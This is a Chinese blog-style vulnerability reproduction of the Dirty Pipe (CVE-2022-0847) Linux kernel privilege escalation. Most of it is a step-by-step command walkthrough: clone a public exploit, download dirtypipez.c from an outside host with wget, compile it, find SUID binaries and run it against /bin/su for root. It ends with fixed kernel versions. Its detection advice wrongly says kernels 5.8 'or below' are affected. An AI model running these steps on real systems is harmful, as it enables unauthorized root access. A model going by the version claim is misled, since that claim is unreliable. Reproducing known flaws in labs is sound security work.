0x00 前言
CVSS 评分:7.8
影响范围:5.8
通过 CVE-2022-0847,RT 可以覆盖重写任意可读文件中的数据,从而将普通权限的用户提升到特权 root 级别。
这个漏洞被作者命名为 Dirty Pipe,之所以这样命名,是因为其原理与 Dirty Cow 相似,但 Dirty Pipe 更容易被利用。
0x01 漏洞检测
检测方法非常简单,只需执行 uname -r 命令。如果返回的内核版本为 5.8 或以下,则可能受到该漏洞的影响。

0x02 环境搭建
环境依赖:
Ubuntu 16.04 或 18.04(推荐)Python >= 3.6(不支持 Python 2.x!)pip3
代码语言:javascript代码运行次数:0
git clone https://github.com/brant-ruan/metarget.gitcd metarget/pip3 install -r requirements.txtsudo ./metarget cnv install cve-2022-0847

环境搭建完成后,查看当前系统内核版本:
uname -r

可以看到系统内核版本为 5.8,说明可能受到该漏洞的影响。
0x03 漏洞复现
方法一:CVE-2022-0847-DirtyPipe-Exploit
首先,将 POC 通过 git 克隆下来:
git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploitcd CVE-2022-0847-DirtyPipe-Exploit
然后开始提权:
gcc exploit.c -o exploit./exploit

在我的测试中,提示 su: must be run from a terminal,提权未成功。作者提到他的电脑电量不足,暂时没有时间解决这个问题。

方法二:dirtypipez.c
后来,p 牛提到网上其他 POC,我测试了下面的 POC,可以成功提权:
mkdir dirtypipezcd dirtypipezwget https://haxx.in/files/dirtypipez.cgcc dirtypipez.c -o dirtypipez

这个 POC 需要事先找到一个具有 SUID 权限的可执行文件,然后利用该文件进行提权。可以使用以下命令找到这类文件:
find / -perm -u=s -type f 2>/dev/null

这里以 /bin/su 为例,直接运行 ./dirtypipez /bin/su 即可提权:
./dirtypipez /bin/su

0x04 漏洞修复
更新升级 Linux 内核到以下安全版本:
Linux 内核 >= 5.16.11Linux 内核 >= 5.15.25Linux 内核 >= 5.10.102
往期推荐
云安全 | 容器基础设施所面临的风险学习
云安全 | 云原生安全是什么?
一键创建隐藏账号
以上就是漏洞复现 | DirtyPipe CVE-2022-0847 Linux 内核提权漏洞复现的详细内容,更多请关注创想鸟其它相关文章!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/23065.html
微信扫一扫
支付宝扫一扫